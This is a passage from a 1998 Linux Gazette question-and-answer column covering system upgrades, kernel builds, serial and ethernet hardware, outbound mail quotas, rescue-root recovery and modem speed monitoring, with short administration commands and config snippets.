In this case the upgrade was silky smooth. I had to fuss a little to get in a new X server (different video card, remember) and the new system really didn't like the PS/2 mouse that I gave it (which was of no consequence, since my father uses a serial port trackball, so the mouse that I had on /dev/psaux was just a temporary one anyway).
Oh, yeah, I had to compile a new kernel to support the ethernet card I'm using (a Tulip-based Netgear). There was probably a module lying around the CD for it somewhere --- but so what. It's a good test for the system.
At this point the old computer is sitting in the living room, and the new one is in his room running Mathematica. In a week or so (when we're really convinced that everything is really O.K. with the new box) I'll prep that old 486 up as a server (my colocated server is due for an upgrade --- so this one will go in for it, and that one will become the spare and test bed).
I can understand how most users don't want to have whole systems around as spares. However, these days, it's not too expensive to keep an extra 6Gb hard drive laying around for these sorts of "major" upgrades. It's also a good way to insure that your backups are working (if you use the "restore" method rather than a network "replication" trick).
Note that this whole process, as complicated as it sounds, only takes a little more "human" time than just slipping in the CD and doing it blindly. The system keeps pretty busy --- but I don't wait for it; I only issued 10 commands or so (I have a couple of scripts for "tardiff" and "replicate" to save some of the typing).
For the daring, you can run a program called 'rpmwatch' (for Red Hat or other RPM-based systems) or "autoup.sh" (Debian). You point these at your favorite mirror and they will automatically update new packages.
Of course this is "daring" --- I personally wouldn't consider it from any public mirror site. I have recommended it to corporate customers, where they point their client systems at an internal server and their staff posts rpm's after testing (limited automated deployment). This is a little easier for some sorts of upgrades than using 'rdist' and home brewed scripts.
In terms of upgrades --- my main "gateway" (router, server, mailhost, uucp hub, and internal web server) is an old 386/33 --- it's about a decade old, has 32Mb of RAM, and a single, full SCSI chain with a few gig of disk space. It runs an old copy of RH 4.2, which is an upgrade (disk replication/swap method) from 3.03, which is an upgrade from Slackware 1.(something), which was an upgrade (wipe and re-install from scratch) from SLS something (running a 0.99p10 kernel).
I used to use that machine (antares) for everything (even X --- it has a 2mb STB Powergraph video card that cost more than a new motherboard would have). However, these days I mostly use 'canopus' -- a S.u.S.E. 5.1 upgraded to 5.3 (blindly --- I was feeling lazy!) My wife mostly uses her workstation, 'betelgeuse' --- which came from VA Research with some version of Red Hat (read the review I wrote for Linux Journal if you're really curious) --- and was upgraded (new installation on new drive, copy the data) to S.u.S.E. 5.2.
So, you can see that we've used a variety of upgrade strategies around the house over the years.
As for installing a new kernel: do a good backup. Now ask: Can I afford a bit of down time if I break the system (while I restore it)? If the answer is "Yes" then go get a 2.1.124 (or later) kernel and try that. We're getting really close to 2.2 and only a few thousand people have tried the new kernels. So we want lots of people to at least try the current releases before we finally go to 2.2.
(Linus doesn't want to have 36 "fix" releases to the next kernel series).
The new kernel should be much faster in TCP/IP performance (already one of the fastest on the platform) and much, much faster in filesystem performance (using the new dcache system).
So, try the new kernel. Be sure to get a new copy of pppd if you use that --- the kernel does change some structure or interface that the old version trips on.
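If you've never built a kernel, the dance goes roughly like this (assuming the new source tree is unpacked in /usr/src/linux; the version number is just an example):

cd /usr/src/linux
make menuconfig            # select drivers; build SCSI/ethernet in statically
make dep && make clean     # rebuild dependencies (required in 2.0/2.1 trees)
make zImage && make modules && make modules_install
cp arch/i386/boot/zImage /boot/vmlinuz-2.1.124
# add an entry for the new image to /etc/lilo.conf, keep the old
# kernel's entry as a fallback, then re-run the map installer:
/sbin/lilo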
This upgrade will not be nearly as big a deal as the 1.2 to 2.0 shift (which was the most disruptive in the history of Linux as far as I can tell --- the formats of entries under /proc changed, so it broke the whole procps suite of utilities, like the 'ps' and 'top' commands). I haven't seen any such problems from the 2.0 to 2.1 kernels (I'm running a 2.1.123 at the moment, on canopus; antares is running on 2.0.33 or so --- it is least frequently upgraded because it is the server).

(?)Looking forward to your answer. Frits.


(?)Linux Support for the DigiBoard C/X Intelligent Serial Ports

From Dave Barker on 08 Sep 1998

I'm trying to set up a Linux RH 5.0 box as a dial-in server using a DigiBoard C/X host adaptor and a 16 port C/Con 16 Concentrator. What I'd like to know is:

Does Linux support software-controlled serial ports? The current attempt has been to set up a 15MB DOS partition as the boot, install the DOS drivers from Digi, and then add the COM ports into Linux.

(!)The question (as stated) is flawed. On a PC all multi-port serial boards require some form of software to control them (since the BIOS/firmware only supports 4 COM ports). In addition, the BIOS support for COM ports is extremely limited and slow --- so all communications software (under DOS, Windows, OS/2, Linux and other forms of Unix, etc.) has bypassed the firmware and used direct access to the I/O ports that control the serial ports, as well as those that actually carry the serial data.
So, a more reasonable restatement of your question might be:
Can Linux use the DOS drivers supplied by Digi?
... that answer is "no." (It is also "no" for NT, other forms of UNIX, OS/2 and probably for Win '95/'98 as well).
Device drivers are generally not portable between operating systems. The interface between an OS kernel and its device driver is typically unique for each OS. There has been some discussion about creating a portable PC device driver specification --- to allow SCO, Solaris, Linux, and *BSD to share (at least some) device drivers. That will probably never happen --- and even if it does it will probably never extend to non-Unix-like operating systems.
Now, regarding the broader question:
Does Linux support the Digi C/X intelligent serial port subsystem?
When I last corresponded with Digi about this they assured me that they would have native Linux drivers by the end of that summer. That was over a year ago. I did check back on their web site a couple of months ago and it didn't seem to indicate that they'd ever delivered on this promise.
The obvious thing to do would be to contact their support staff and ask for native Linux drivers. It may be that their web site is out of date, or that my efforts to weed through their pages were inadequate (the bigger the company, the worse their web site).

[ I dunno about the Digi International site, (which is being redesigned right now) but the Linux Digiboard Page might be useful, even though it's rather old. -- Heather ]

(?)Next if this would work in theory what is the proper way to go about setting the serial ports up?

(!)The "proper way" would be to use the device drivers that work with your OS. Another way, might be to run the DOS drivers under 'dosemu' (configuring that with sufficient access to the hardware and I/O permissions map that the Linux kernel will let it drive the serial board). However, that would only allow DOS to access the devices.
In the project where I initially contacted them I was using an operating system called TSX-32 (by S&H systems: http://www.sandh.com) --- and the TSX-BBS (also by them).
This package is a 32-bit multi-user commercial (closed source) OS that's modeled after the old TSX-Plus and RSX-11 (a predecessor to VMS on the PDP-11 platform). It also runs a decent DOS emulator, and the BBS has some nice features that make it more scalable than any other that I'd seen.
(I've run Galacticomm MajorBBS and eSoft TBBS systems, which used to be limited to single CPU's, had no TCP/IP support, no end-user scripting facilities, limited support for doors, and little or no support for intelligent serial hardware --- such that 255 lines was about the maximum. PCBoard was limited to about 4 to 8 lines per PC --- and you needed a Netware server to cluster those. TSX-BBS can handle 250 lines per server, and multiple servers can peer over TCP/IP for a potential of thousands of lines).
Obviously Linux (and other forms of Unix) have that sort of scalability --- given the drivers. There are some big Unix/Linux BBS' out there (like MMB "Teammate" and a native port of Galacticomm's BBS --- renamed to something like "WorldPort" --- though I don't remember the details).
My enthusiasm for TSX-BBS has waned a bit (they aren't getting out the updates that I'd hoped for). However, that's a non-issue since I left that position long ago and no longer have to maintain any BBS' (and the whole dial-up bulletin board system phenomenon seems to have waned almost as much as UUCP).

(?)I'm really in a bind here, and could use any help I can get! Thanks in advance David Barker

(!)I would beat up on Digi --- and, if they don't satisfy your needs --- consider one of their other models (a number of them do support Linux) or Rocketport, Equinox, Comtrol, Cyclades, Stallion, or other vendors of multi-port serial hardware that will support Linux.
Naturally I understand that this may entail major reworking of your plan. The C/X is the only system that I know of that allows you to connect 250 ports to a PC using only one bus slot. You might have to rework your plan to use multiple Linux systems, each with multiple serial port boards, and configure those as "terminal servers" (have them binding the incoming serial/phone connections into 8-bit clean rlogin/telnet sessions to the master server).
Of course you could also look at traditional terminal servers. These are router-like devices that do precisely what I've described (often with support for their own authentication --- RADIUS and/or various versions of TACACS --- and support to provide PPP and/or SLIP instead of the rlogin/telnet-like session that would be used for dial-up terminal use).
Naturally, to give you better advice and more specifics I'd have to know more about your requirements and less about the particular problems you've encountered with your currently proposed solution. All I can currently guess about your requirements is that you need support for a bunch of serial lines (you said "dial-in" so I can also guess that a bunch of modems are involved).
If you already purchased the C/X and you already selected Linux for this project then shame on you --- you really need to do requirements analysis before committing to various implementation details (specific hardware and software). (If you're just stuck with some stuff you had laying about for a skunkworks project --- then my condolences; you might need to negotiate some funding for it).

(?)NE2000 "clones" --- not "cloney" enough!

From Jack on 08 Oct 1998

Hi, I am a huge fan of Linux and all that GNU stands for. I got my first taste of Linux back in the 0.99 days. Since that time I have poked and prodded along with different flavors of installation, but due to my work environment I have never been able to jump in with both feet. I have finally scraped together a modest system for my home use that I can dedicate to Linux, and wanted to get it set up as a network server. I have been reading articles, HOWTOs, and the like about setting up network access. Each of the references has always begun past the step where I am getting hung up. I cannot get the system to recognize my ethernet card.

True it is an NE2000 clone (cheap), but Win95 recognizes it just fine and the software packaged with it has no trouble locating the card, nor does the plug-n-pray BIOS. I read the Ethernet-HOWTO, which tells about issuing commands during the lilo startup, and tried that with the values returned from the packaged diagnostic software. I'm hoping this is just something I'm overlooking or mis-read or didn't read (yet), and not a situation where I need to upgrade the ethernet card (my last option). I came to you as my next to last option since you have given so many people good advice in the past. I hope you can help and look forward to hearing from you soon.

Jack.

(!)Replace the ethernet card. Go get a Netgear (Tulip based) or a 3Com (3c509).
I had exactly the same problem when I first tried to configure a Linux system to use some NE2000 clone.
It probably has nothing to do with Plug-n-pray or IRQ's or I/O ports, or kernel drivers, or options, or your ifconfig command. I tried everything with that card --- and it just plain wasn't recognized!
Trust me. You can spend $30 (US) or less on a supported ethernet card and it will almost certainly just work. Or you can spend the same hours I did thinking "I must be stupid" and then go buy the card.
The term NE2000 should be taken with a large block of salt (the kind we used to haul out to the horse pastures when I was a kid). They are "NE2000 compatible" in about the same way as a "winmodem" is "Hayes compatible" --- only when you use them through the "supported" software.
True hardware-level compatibility involves using the exact same sets of I/O ports and other functions as the original. Most of the cheap NE2000 clones just aren't compatible; they have to supply their own versions of the drivers --- and they only achieve "compatibility" through the software interfaces.

(?)The Infection and the Cure: (Good Times as a Virus)

From [email protected] on 23 Oct 1998

You're certainly entitled to your opinion, and you could get much response and satisfaction (if you are a troll) by

I think I had been a troll by sending my mail to the Answer Guy.

(!)I didn't think you were trolling me.

(?)None of this is relevant to Linux. Most Linux users are sophisticated enough to simply ignore these threads (clearly I fail that test, myself).

I apologize. I had found the Linux Gazette lately and read many of the issues in the last days. I was impressed by your column and I am now enlightened that I contacted you in the wrong context. I hope I will think more about what to send to whom in the future.

(!)No apology is necessary. You stated an opinion, I disagreed with it. The discussion is mildly offtopic. I pointed that out.

(?)Some have referred to "Good Times" hoaxes as "mental viruses" --- more power to them. By their token *you* have been infected since you have revived (brought back to life) the discussion.

Yeah, I should be more careful about where I put my focus.

Hope I stole not too much of your time.

(!)No problem. I'm the one that volunteers for this gig.

(?)Yours, Peter Wiersig

(If any of the above doesn't make much sense, it may be because English is not my first language.)

(!)Sometimes I'm not sure my English is up to snuff either.

(?)More on International Keyboard Mappings and Monochrome X

From Axel Harvey on 08 Sep 1998

Further to my verbose text of last night. I realized after spouting away that accent and symbol keys will not elicit any response from the shell command line (except a rude beep) but they do work perfectly well in text-receiving functions like pico and pine. I, poor sap, had been modifying and reloading my test keymap, then seeing if the keys worked from the command line...!??!

I should have mentioned that the RedHat distribution has a French keyboard which works, but I don't find the layout very useful. I shall send them my own version of a French keyboard as soon as I have refined it sufficiently.

(!)Yep.

(?)I still don't understand my problem with X installation.

(!)Have you tried the suggestions I already gave?

(?)Are you plagued by questions from stupid guys who could solve their own mysteries with one more hour of futzing?

(!)That's not stupidity. Hours of "futzing" is experience. I personally feel that the hours of "futzing" that I've done should benefit others besides myself.
However, I am plagued by questions that are more readily answered in HOWTO's and even some questions that I can only categorize as stupid (like phreak/cracker wannabe's and jobhunting AS/400 specialists).

(?)Suggestions for Linux Users with Ultra Large Disks

From Tom Watson on 09 Sep 1998

Answer guy:

In several questions, I see people asking about booting large disks with older machines. A while ago I built up a machine like this, and had a reasonable solution.

While I can understand that the problem is often interference with the "other" operating systems, in my case I had an older '486 motherboard which, given the requirements for windoze, was a bit out of date, but quite reasonable for Linux. When I attempted a "normal" installation on the larger disk, the first (root) partition ended up quite a bit over the 540 MB BIOS limitation. It took me a few attempts at running LILO and understanding its error messages (I even tried the "linear" option) to understand the problem (I hadn't used a disk that large before). When I remembered the "540MB" problem, the solution I explained above seemed the "easiest" to implement, with the least amount of "hassle". It only took a few symbolic links/copies and I was done. The "basic" root partition was still intact, and nobody really worried about the difference. I feel that if I wanted to, I could have made a "small" partition and installed the "root" files there, but most installations want a larger partition to get "the whole works" installed.

Sure this gets around the "1024 cylinder" problem, but usually that is all that is needed. Linux, once it has started the kernel, supplies the drivers for further operation. The small partition is only used to accommodate the BIOS, whose ONLY function is to load the kernel anyway.

I suppose an alternative is to use "loadlin" under DOS, but you still need to boot DOS, and the 1024 cylinder problem comes up again.

I'm trying to get a solution that involves "minimum impact".
-- Tom Watson         I'm at work now (Generic short signature)

(!)All true enough. My point is that my answers are not simply intended to show what works for me or what is minimum impact for one situation (usually a situation about which I'm given very little information). My answers try to cover a large number of likely situations and to suggest things that no one seems to have tried before (like the auto-rescue configuration I was babbling about).
I've frequently suggested small partitions, LOADLIN, alternate root partitions, even floppy drive kernels.
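To make the small-partition trick concrete, here's a hedged sketch of such a layout (device names and sizes are hypothetical):

/dev/hda1   /boot   small, entirely below cylinder 1024; the kernel
                    and LILO's map files live here
/dev/hda2   /       the big root partition; once the kernel is loaded,
                    Linux's own drivers take over and the BIOS limit
                    no longer matters

# the relevant corner of /etc/lilo.conf:
boot=/dev/hda
image=/boot/vmlinuz
        label=linux
        root=/dev/hda2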
Another problem --- the source of this whole thread has to do with support for these Ultra-DMA drives that are over 8Gb. I guess that the most recent kernels (2.0.35 and later?) have support for a different IDE driver that can handle these. I thought I'd seen reports of problems with them. I commented on this in the hopes that someone would give me the scoop on those.

(?)Query

From Christopher & Eunjoo Kern on 21 Oct 1998

Mr. James Dennis:

I had been given your name as a reference from a coworker of mine. He has told me that you often answer the most difficult of questions regarding Windows 95 and Linux software. Are you indeed the fellow my friend speaks of, and could you possibly answer a question or two of mine?

Kern.

(!)I actually answer Linux questions. I get a lot of Win '95 questions, which I grudgingly answer to some small part of my extremely limited ability.
Although I bump into Win '95 occasionally at my customer's sites and with some friends, I probably have clocked in less than 10 hours of "driving time" on it and NT and Win '98 all told.
I answer Linux questions for free for the Linux Gazette. You can see many of those by pointing your web browser at: http://www.linuxgazette.com (they also have a nifty search feature).
Linux Gazette is part of the Linux Documentation Project (LDP: http://www.sunsite.unc.edu). That's the best resource for basic Linux information.
So, what are your questions?

(?)Conflict: Num-Lock, X Window Managers, and pppd

From Victor J. McCoy on 11 Oct 1998

Please publish this. After the original question, I received a number of inquiries indicating that I'm not the only one with this problem.

Last year in LG22 (Oct97) I asked a question regarding a window manager and pppd anomaly.

Quick answer: Num-Lock key activation.

Long answer:

I finally got fed up with the problem, so I tore my machine apart, down to a single SCSI controller (with only my root drive), keyboard, modem.

The problem continued. I have since upgraded to Red Hat 5.0, and the problem persisted; different window managers also exhibit the problem (just differently). I even changed to Caldera Lite 1.2, and I still had the problem.

Believe it or not, it turned out to be my NUM-LOCK key. If NL is active, then the WM screws up EVERY TIME; different WMs just screw up differently. I would turn on Num-lock to ping a host IP addr and that would be all it took.

I have a MS natural keyboard (Of all the products MS has, software sucks, but I love the hardware [KB and Mouse].) I'm sure that's not the problem, because I've only recently acquired the KB and the problem has been around for a couple of years.

I would like to know if this is a widespread problem. Surely, I'm not one of very few people to use the numeric keypad.

Victor J. McCoy

(!)I'll just let this message speak for itself. I'm not really sure what it's saying but it sounds like a call for other people to do some testing. What happens if you have your NumLock key active when you start up and use your ppp link from within an X session?
As for ways to try to alleviate the problem:
... I don't know of good ways to troubleshoot or isolate this, off hand. Look in your syslog (/var/log/messages) for "oops" or similar messages from the kernel. Try strace on the X server and the window managers, and on pppd (also run pppd with its full debug and kdebug options). Try adding ipfwadm (or ipchains) rules with the -o switch (to "output" details of every packet to your syslogs). You could also capture tcpdump traces from the ppp0 interface during the whole affair.
It's probably something specific to your hardware --- since you've changed your software completely. I'll be curious if you can isolate the problem to a specific library function or system call.

(?)Quotas for Outgoing e-mail

From tng on 14 Sep 1998

I've been searching for 3 days on setting up some kind of e-mail quota to restrict the amount of e-mail that can be sent by a particular person. I've been to AltaVista and did a search that turned up 1700 matches, none of which were of any help. I went to sendmail.org and browsed their online documentation, and gone through newsgroup archives, to find myself still wondering if there is software available to do it. I found lots of info about setting up bulk e-mailers and stopping incoming spam, but nothing for stopping my local users from bulk e-mailing and spamming others. I would be grateful for any help on this matter.

thanks in advance... tng

(!)Well, that's a new one. I don't know of any package that does this.
I'm sure it can be done --- you could define a custom mailer (one of those funny looking Mprog lines in a sendmail.cf file). Let's call this the quota mailer --- you'd then define that as the mailer to over-ride the built-in smtp mailer. Your quota mailer could then be responsible for counting messages, addresses, bytes, etc., and updating a database of authorized users and relayers --- and then relaying the mail into a queue where a different sendmail (using a different configuration) would send it out (probably as a regular 'cron' job).
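Just to make the shape of the thing visible, here's a very rough sketch of such a wrapper --- every detail (the paths, the 200-message quota, the counter directory, the second configuration file, even the name 'quota-mailer') is hypothetical:

#!/bin/sh
# quota-mailer (sketch): count outbound messages per sender, then hand
# the message off to a second sendmail instance for actual delivery.
SENDER="$1" ; shift
COUNT_FILE="/var/spool/mailquota/$SENDER"
COUNT=`cat "$COUNT_FILE" 2>/dev/null || echo 0`
if [ "$COUNT" -ge 200 ] ; then
        echo "daily mail quota exceeded" 1>&2
        exit 75                # EX_TEMPFAIL: the message stays queued
fi
expr "$COUNT" + 1 > "$COUNT_FILE"
# relay into the outbound queue under an alternate configuration
exec /usr/sbin/sendmail -C /etc/sendmail-out.cf "$@"

A cron job would zero the counters once a day, and the Mprog line in sendmail.cf would name this script as the mailer's P= program.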
The quickest way to get such a beast built might be to hire a consultant like Robert Harker (he specializes in 'sendmail' and teaches tutorials in it http://www.harker.com).
For qmail or VMailer there might be an easier way.
Another problem you'll have with this is that you'd have to prevent people from bypassing all of your mail user agents and sending their mail using some custom program that they've installed themselves. This could work by simply opening a TCP connection to the smtp port (25) of their addressee's sites (or any open relayer) directly. You'd have to put packet filters on all of your egress routes (firewalls and border routers) to prevent this, thus forcing your customers/users to use your outbound relay.
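The packet-filter half of that might look something like this on the border router --- I'm showing 'ipchains' syntax (2.1.x kernels), and the relay address 192.168.1.10 is hypothetical:

# let the designated relay speak SMTP to the world...
ipchains -A forward -p tcp -s 192.168.1.10 -d 0.0.0.0/0 25 -j ACCEPT
# ...then log and drop direct outbound SMTP from everyone else
ipchains -A forward -p tcp -d 0.0.0.0/0 25 -l -j DENY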
There are several commercial products that do filtering of outbound mail (MIMESweeper, WebShield, that sort of thing). They purport to protect companies from insiders who might be mailing company secrets out to their competitors. In general I think this is a pathetic approach to the risk (they can easily shove the data on a diskette, Zip disk or whatever, and mail it; or they can encrypt it --- using pkzip with its "scramble" encryption and mail that as a "bitmap" --- or they can use freely available tools to do some serious steganography).
However, these "mail firewalls" may be adaptable to your needs. Also, there may be some free one floating around that I haven't heard of.
The best place to ask for more info on this is in the comp.mail.sendmail newsgroup (I don't know of a general mail transfer agents newsgroup -- so c.m.sendmail seems to get all of that traffic. I expect there'll be a comp.mail.qmail and a comp.mail.vmailer eventually).
I suppose you could also ask in comp.security.firewalls --- and you could dig up the mailing lists for qmail, VMailer and the firewalls mailing list (which recently moved off of Brent's site at Great Circle Associates and is hosted by some friends of his at GNAC) --- you'll have to spend some quality Yahoo!/Deja News/Alta Vista time hunting down those venues.

(?)Automated Recovery from System Failures

From anonymous on the L.U.S.T List on 2 Sep 1998

And there will be no human to manually check on the partitions after a power failure.

What's wrong with e2fsck? TTYL!

(!)I was thinking about this recently and I came upon an interesting idea. (I think a friend of mine used the following trick in a commercial product he built around Linux).
The trick is to install two root filesystems (preferably on different drives -- possibly even on different controllers). One of them is the "Rescue Root" the other is the "Production Root." You then configure the "rescue root" partition as the default LILO device and modify the shutdown sequence to over-ride that default with an /sbin/lilo -R command.
If the system boots from the rescue root it is because the system was booted irregularly. The standard shutdown sequence was not run. That rescue root can then do various diagnostics on the production root and other filesystems. If necessary it can newfs and restore the full production environment (from another, normally unused, directory partition or drive). The design of the rescue root is a matter for some consideration and research.
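A hedged sketch of the LILO half of this arrangement (devices and labels are hypothetical, and I'm assuming a LILO recent enough to honor 'default='):

# /etc/lilo.conf --- boot the rescue root unless a clean shutdown
# said otherwise
default=rescue
image=/boot/vmlinuz
        label=production
        root=/dev/hdb1
image=/boot/vmlinuz
        label=rescue
        root=/dev/hda1

# ...and near the end of the shutdown sequence:
/sbin/lilo -R production        # one-shot default for the next boot only

Since the '-R' setting is consumed by the next boot, any boot that wasn't preceded by a clean shutdown lands in the rescue root automatically.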
Normally the system will boot into "production" mode. Periodically it can mount the alternative root fs to do filesystem checks and/or an extra filesystem to do backups (of changes to the configuration files). You can ensure that these configuration backups are done under a version control system so that degenerative sets of changes can be automatically backed out in an orderly fashion.
If you combine this with a watchdog timer card and a set of appropriate system monitoring daemons (which all talk to a dispatcher that periodically resets the watchdog timer), you should have a system that has about the most bulletproof autorecovery as is possible on PC equipment.
I should note that I haven't prototyped such a system yet. I've just thought of it. A friend of mine also suggested that we devise a way to have another proximate system also doing monitoring (possibly via a null modem). He says he knows how to make a special cable which would plug into the guard dog's printer/parallel port (guard dog is what I've been calling the hypothetical proximal system) and would be run into the case of the system we're monitoring, where it would fit over the reset pins. This, with a small driver, should be able to strobe the reset line.
(In fact I joked that we could create a really special cable that would daisy chain to as many as eight other systems and allow independent reboot of any of them).
In any event the monitor system would presumably monitor some/most of the same things as the watchdog timer; so I don't know what benefit it would ultimately offer (unless it was prepared to do or initiate failover to another standby system).
Perhaps this idea might be of interest to the maintainer of the High-Availability HOWTO (Harald Milz -- whom I've blind copied on this message). It's not really "High Availability" but "Automated Recovery" which might be sufficiently close for many applications. (i.e. if a web, mail, dns, or ftp server's downtime can be reduced from "mean hours per incident" to "mean minutes per incident" most sysadmins still get lots of points).

(?)Automated Recovery from System Failures

From R P Herrold on 04 Sep 1998

(!)We build custom Linux solution boxen. In our Build outline, we take this concept a step further in setting up a redhat system -- we carry a spare /boot partition:

(extract)
(base 5.0 install)

Part     name            size    Cyl     cume    actual min
====    ==========      ====    ====    ====    ==========

 1       /boot           20      ___      20
 2       root            30      ___      50     23
                         (/bin           ___ M)
                         (/lib           ___ M) modules
                         (/root          ___ M)
                         (/sbin          ___ M)
 3       swap            30      ___     80
 4       (extended)
 5       /mnt/spare      30      ___     110     1

... The minima in a 'stripped down' / [root] partition vary depending on where /lib, /var, and /usr end up -- of late, a lot of distributions' packages feel a need to live in /bin or /sbin unnecessarily -- and probably should be in the /usr tree ... Likewise, if a package is NOT statically linked, one can end up with problems, if a partition randomly decides to 'go south.'

(!)I was thinking about this recently and I came upon an interesting idea. (I think a friend of mine used the following trick in a commercial product he built around Linux).

(!)... We use the 'trick' as well

(!)The trick is to install two root filesystems (preferably on different drives -- possibly even on different controllers). One of them is the "Rescue Root" the other is the "Production Root." You then configure the "rescue root" partition as the default LILO device and modify the shutdown sequence to over-ride that default with an /sbin/lilo -R command.

(!)... carrying the full [root] partition

(!)I should note that I haven't prototyped such a system yet. I've just thought of it. A friend of mine also suggested that we devise

(!)... It works, and can avoid the need to keep a live floppy drive in a host which would otherwise require one for emergency purposes ... aiding in avoiding physical security issues

[ normally I remove sig blocks, but since he copyrighted his... I guess I'll leave it in. Curious one should post a copyright into open mailing lists, though. -- Heather ]

.-- -... ---.. ... -.- -.--
Copyright (C) 1998 R P Herrold
NIC: RPH5 (US)
My words are not deathless prose,
but they are mine.
Owl River Company 614 - 221 - 0695
"The World is Open to Linux (tm)"
... Open Source LINUX solutions ...


(?)Re Script

From Joe Wronkowski on 23 Oct 1998

Hi Jim,
I was just wondering if there was an easy way to grab the time/date Oct 6 21:57:33 from the same line the 153.37.55.** was taken from. If you are busy I understand.

Thanks
Joe Wronkowski

(!)The following awk one-liner will isolate the date and time from these example lines --- syslog lines split on whitespace, so the month, day, and time are fields one through three:

awk '/153\.37\.55\./ { date = $1 " " $2 ; time = $3 ; print date, time }' /var/log/messages

(?)sample of log file:

Oct  6 21:50:19 rogueserver in.telnetd[197]: connect from 208.224.174.21
Oct  6 21:50:24 rogueserver telnetd[197]: ttloop:  peer died: Success 
Oct  6 21:55:29 rogueserver in.telnetd[211]: connect from 208.224.174.21
Oct  6 21:55:35 rogueserver telnetd[211]: ttloop:  peer died: Success 
Oct  6 21:57:33 rogueserver in.pop3d[215]: connect from 153.37.55.65
Oct  6 21:57:34 rogueserver in.pop3d[215]: Servicing request for rogue

The original message in this thread appeared in Issue 31, and the comp.unix.questions newsgroup. This volley resulted:


From Michael Schwab on 30 Sep 1998

Hello, I just read the article about

So please don't say "WHO CARES ABOUT THAT?"

(!)I'll say what I bloody well feel like saying!
(And I expect my editors, and readership to respond as they see fit).
I'm sorry if that seems like a harsh thing to say but frankly I think you missed the whole point of what I was trying to say before.
First, I don't know of a general way to get the connect speed. It's probably modem specific, so you could probably write a script that queries your modem to get the info. Your script would probably not work with most other modems, and you'd have to hack it into whatever communications package you were actually using on that modem (pppd, uucico, minicom, kermit, slip, whatever).
Another point I made is that the speed is likely to fluctuate frequently throughout the duration of a connection (particularly with any 28.8 or faster modem). It's likely to start out a bit high and be adjusted downward until the corrected error rate attains a suitable threshold.
So, if you had your script reporting a connection speed at one instant --- it would tell you almost nothing about your sustained throughput.

(?)I do !!

(!)More power to you. I didn't ask "who cares?" I asked what benefit those who "think" they care hope to derive from this statistic.
I can test the temperature in my house to within arbitrary precision. However, the numbers on a thermometer will not motivate me to reset my thermostat or go out and buy a new furnace or air conditioner. It's a meaningless statistic that is of no benefit to me.
Also there isn't just one temperature in my home -- there's a whole range of fluctuating temperatures. So precise measurement would be non-trivial.
For subjective issues there's no point in going to great measurement effort. When I'm cold I either turn up the thermostat, or (more likely) toss on a sweater or some little fuzzy booties.
Now, it is the case that I might do some measurements when I'm troubleshooting a line. I'd certainly expect a telco technician to do so if I was complaining about line quality --- and I might do so to "motivate" a telco (or to file my complaint with a public utility commission).
Of course if I was really serious about a line quality issue I'd rent an oscilloscope and look through a Fluke (TM) catalog to find a chart-strip recorder for the job.
So these numbers aren't completely useless in all contexts. However, the number of people who can make reasonable use of them is fairly limited.

(?)How can you tell the connection speed that a modem auto-negotiates when dialing an ISP? My system log (/var/log/messages in RH5.1) does tell me the line speed I have set in the chat script, but I would like to know the connect speed as well (56K, 33.6, etc). I know this info must be available somewhere/somehow.

(!)Modern modems don't just auto-negotiate at the beginning of a call. They "retrain" (negotiate speed changes) throughout a call's duration.
You'd "like" to know. Put what would you do with this? Order you phone company to pull new copper to your house? Return your modem and try another one? Switch to tachyon beams?
As for "this info must be available" --- look in the programming manual for your modem, if you can find one. It used to be standard for modems to come with a pretty decent technical manual --- providing details on a couple hundred AT commands that comprised that manufacturer's extensions beyond the based "Hayes" set for that particular model. These days you'll be lucky if you pry a dinky little summary of a tiny subset of their diagnostics and commands out of most of these manufacturers.

I don't know how to really get the connect speed, but that might not be so important. Since I have a leased line to the Internet with a modem, it is important for me to know how fast my line is running, because sometimes this line might have a lot of noise on it and the connection might be only 4800 bps instead of 33600 bps. In this case I have to call my telecommunications provider to check the line!

(!)If your connection varies by this much you'll know it. You won't need any numbers to tell you that it's *slow*.
If you are trying to serve your customers (web site users, whatever) over this line --- it does make sense to monitor the bandwidth and latency. However these are higher level networking issues that are only marginally related to the underlying connection speed.

But it's easy to detect: just send a ping to the other side when the line has low traffic. I do this by sending approx. 20 pings and then looking at the (lowest) round-trip time. You can send a ping containing 8192 or 16384 bytes of data and you will detect nearly every change in bandwidth.

(!)Aha! Now this is a totally different metric. You aren't measuring "modem connection speed" --- you're measuring latency and throughput! Doing this once every two or three hours with about 5 pings, and setting "watcher" to monitor those and warn you when the latency gets too high or the throughput gets too low, would make sense --- for a dedicated line where you are concerned that your customers/users are waiting "too long" for their traffic.
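As a sketch, that periodic check needn't be more than a couple of commands (the hostname is hypothetical):

# latency: a few pings, then read the min/avg/max summary line
ping -c 5 remote.example.com | tail -1
# throughput probe: large packets make bandwidth changes visible
ping -c 5 -s 8192 remote.example.com | tail -1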
There is a package called MRTG --- the "multi-router traffic grapher" which can be used to create web page graphs of your network traffic statistics over time. It seems to be primarily used by larger sites for ethernet. However it might have some facilities for monitoring PPP (even SLIP) lines.
Actually MRTG depends on SNMP so I should say that you might figure out how to configure the CMU SNMP agents for Linux to interface to your serial interfaces --- and then MRTG could provide the graphs. However, you don't technically need to run SNMP under MRTG --- their docs suggest that you can use various commands to provide it statistics to graph.
You can read more about MRTG at:
http://ee-staff.ethz.ch/~oetiker/webtools/mrtg/mrtg.html

(?)Best Regards Michael Schwab


(?)RE how to find out the serial connect speed of a modem

From Michael Schwab on 30 Sep 1998

OK, the intention of the mail sent by me was mainly to give a short help on what might be a suitable answer to the question posed in Linux Gazette. Despite this, THANKS FOR YOUR VERY LONG MAIL; now it's much clearer what you were saying and why. I agree with you when you say the connect speed is unimportant, because it changes anyway during the connection time. Since the guy who sent the question to you said that he connects to his ISP, I suggested that monitoring bandwidth and latency might also be more meaningful for him than just getting the connect speed!

Anyway thanks for your Answer .....

see you soon

Michael Schwab


(?)Telnet/xterm: Log to file

From Jason Joyce on 07 Oct 1998

How can you log a telnet session using it from an xterm in Linux? I need to create a log of my actions during a telnet session, and I know that you can do it using telnet under Microsoft. And I know that if those guys have it, then they must have copied it from somewhere, and so I believe that it is possible using Linux, but I can't find any way.

Thanks for any help, Jason

(!)You can run the 'script' command (which creates a "transcript" named "typescript" by default).
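For example (the log filename and host are arbitrary):

script telnet-session.log        # start capturing everything to the named file
telnet somehost.example.com      # ...the whole session is logged...
exit                             # log out of the remote host
exit                             # leave 'script'; the log file is closed here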
